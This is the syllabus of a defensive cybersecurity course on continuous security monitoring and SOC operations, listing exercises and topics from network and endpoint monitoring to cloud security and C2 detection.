Continuous Monitoring and Security Operations (CMSO)

• Analyze modern hybrid enterprises for deficient protection/detection strategies

• Apply the principles learned in the course to design a defensible cloud, network, and endpoint security architecture and operations

• Understand the importance of detection-dominant security architecture and Security Operations Centers (SOC) for hybrid enterprises

• Identify the key components of cloud, network, and endpoint protection and monitoring across hybrid infrastructure

• Determine appropriate security monitoring needs for organizations of all sizes

Current State Assessment and Security Architecture

Exercises

o Detecting Traditional Attack Techniques with Security Onion and CyberChef

o Detecting Modern Attack Techniques with Security Onion

o Egress Analysis with Elastic Stack

o NetWars (Day 1): Immersive Cyber Challenges

Topics

o Traditional Security Architecture

• Perimeter-focused

• Addressed Layer 3/4

• Centralized Information Systems

• Prevention-Oriented

• Device-driven

• Traditional Attack Techniques

o Introducing Security Onion 2.X

• Alerts Menu

• Pivoting to the Hunt Menu

• The PCAP Menu

o Modern Security Architecture Principles

• Detection-oriented

• Post-Exploitation-focused

• Decentralized Information Systems/Data

• Risk-informed

• Layer 7 Aware

• Security Operations Centers

• Network Security Monitoring

• Continuous Security Monitoring

• Modern Attack Techniques

• Adversarial Dominance 

• MITRE ATTACK(R)

o Security Architecture - Key Techniques/Practices

• Threat Vector Analysis

• Data Exfiltration Analysis

• Detection Dominant Design

• Intrusion Kill Chain

• Visibility Analysis

• Lateral Movement Analysis

• Data Ingress/Egress Mapping

• Internal Segmentation

• Network Security Monitoring

• Continuous Security Monitoring

o Cloud Deployment Models 

• Cloud Shared Responsibilities

• Infrastructure as Code (IaC)

• Overexposed Cloud Services: Leaky Buckets

• Cloud Network Visibility

o MITRE ATT&CK(R) & AWS Security Stack

• AWS Security Hub

• AWS Identity and Access Management (IAM)

• AWS CloudTrail

• Amazon CloudWatch

• AWS Firewall Manager

• AWS WAF + AWS Shield

• Amazon Virtual Private Cloud (VPC)

• Amazon GuardDuty

• Amazon Inspector

• Amazon Macie

Network Security Architecture

Exercises

o ModSecurity o Decrypting TLS with Wireshark

o Detecting Adversaries with Protocol Inspection

o HoneyTokens for Leak Detection

o NetWars (Day 2): Immersive Cyber Challenges

Topics

o SOCs/Security Architecture - Key Infrastructure Devices

• Traditional and Next- Generation Firewalls, and NIPS

• Web Application Firewall

• Malware Detonation Devices

• HTTP Proxies, Web Content Filtering, and SSL/TLS Decryption

• SIEMs, NIDS, Packet Captures, and DLP

• Honeypots/Honeynets

• Network Infrastructure - Routers, Switches, DHCP, DNS

• Threat Intelligence

o Segmented Internal Networks

• Routers

• Internal SI Firewalls

• VLANs

• Detecting the Pivot

• DNS architecture

• Encrypted DNS including DNS over HTTPS (DoH) and DNS over TLS (DoT)

o Defensible Network Security Architecture Principles Applied

• Internal Segmentation

• Threat Vector Analysis

• Data Exfiltration Analysis

• Detection Dominant Design

• Zero Trust Architecture (Kindervag)

• Intrusion Kill Chain

• Visibility Analysis

• Data Visualization

• Lateral Movement Analysis

• Data Ingress/Egress Mapping

Network Security Monitoring

Exercises

o Pcap Carving with Zeek

o Security Onion Service-Side Attack Analysis

o Wireshark Merlin Analysis

o Detecting TLS Certificate and User-Agent Anomalies

o NetWars (Day 3): Immersive Cyber Challenges Labs

Topics

o Evolution of NSM

o The NSM Toolbox

o NIDS Design

o Analysis Methodology

o Understanding Data Sources

• Full Packet Capture

• Extracted Data

• String Data

• Flow Data

• Transaction Data

• Statistical Data

• Alert Data

• Tagged Data

• Correlated Data 

o Cloud NSM

o Practical NSM Issues

o Cornerstone NSM

• Service-Side and Client-Side Exploits

• Identifying High-Entropy Strings

• Tracking EXE Transfers

• Identifying Command and Control (C2) Traffic

• Tracking User Agents 

• C2 via HTTPS

• Tracking Encryption Certificates

• Detecting Malware via JA3

o Detecting Cobalt Strike

• Criminal Usage of Cobalt Strike

• Malleable C2

• Cobalt Strikes x.509 Certificates

Endpoint Security Architecture

Exercises

o Sysmon

o Autoruns

o Application Control with AppLocker

o Merlin Sysmon Analysis

o NetWars Day 4: Immersive Cyber Challenges

Topics

o Endpoint Security Architecture

• Endpoint Protection Platforms

• Endpoint Detection Response

• Authentication Protection/Detection

• Configuration Management/Monitoring

o Endpoint Protection

• TPM: Device Health Attestation

• Host-based Firewall, Host-based IDS/IPS

• Application Control, Application Virtualization

• Virtualization Based Security 

• Microsoft Defender: Application Guard

• Windows Defender: Credential Guard

• Defender for Endpoint: Attack Surface Reduction

• EMET and Defender Exploit Guard

o Cloud Configuration Management

o Endpoint Detection - Sysmon

• FileDelete, ProcessTampering, and other recent additions

• IMPHASH

• DeepBlueHash

o Authentication Protection and Detection

• Privileged Account Monitoring

• Windows Hello

• Dynamic Lock 

• PIN-Only Authentication

• Passwordless

• Azure Active Directory + MFA

• Azure Authentication Methods

• AAD Conditional Access

• Hash/Ticket/Token Attacks

o Configuration Management/Monitoring

• Cloud: Center for Internet Security (CIS) Hardened Images

• Containers: CIS Hardened Images for Containers

• Baseline Monitoring

• Desired State Configuration (DSC)

• Azure Automation State Configuration

Automation and Continuous Security Monitoring

Exercises

o Inventory

o Windows Event Logs

o DNS over HTTPS (DoH)

o Kansa Persistence and Pivoting

o NetWars (Day 5): Immersive Cyber Challenges 

Topics

o Overview

• Continuous Security Monitoring (CSM) vs. Continuous Diagnostics and Mitigation (CDM) vs. Information Security Continuous Monitoring (ISCM)

• Cyberscope and SCAP

o Industry Best Practices

• Continuous Monitoring and the 20 CIS Critical Security Controls

• Australian Signals Directorate (ASD) Strategies to Mitigate Targeted Cyber Intrusions

o Winning CSM Techniques

• Long Tail Analysis

• Australian Signals Directorate (ASD) Strategies to Mitigate Cyber Security Incidents

• The ASD Essential Eight 

o Maintaining Situational Awareness

o Host, Port, and Service Discovery

o Vulnerability Scanning

o Monitoring Patching

o Monitoring Applications

o Monitoring Service Logs

• Detecting Malware via DNS logs

• Detecting DNS Tunneling via Iodine and dnscat2

• Domain_stats and Registration Data Access Protocol (RDAP)

o Monitoring Change to Devices and Appliances

o Leveraging Proxy and Firewall Data

o Configuring Centralized Windows Event Log Collection

o Monitoring Critical Windows Events

• Hands-on: Detecting Malware via Windows Event Logs

o Scripting and Automation

• Importance of Automation

• PowerShell

• DeepBlueCLI o Security Operations Center (SOC)

• Purpose of a SOC

• Key SOC roles

• Relationship to Defensible Security Architecture 

Capstone: Design, Detect, Defend

Topics

o Security Architecture

o Continuous Security Monitoring

o Applied NSM and CSM

o Analyzing Malicious Traffic with Security Onion, Wireshark, and CyberChef

o Analzying Malicious Windows Event Logs

o Packet Analysis

o Log Analysis

o C2 Detection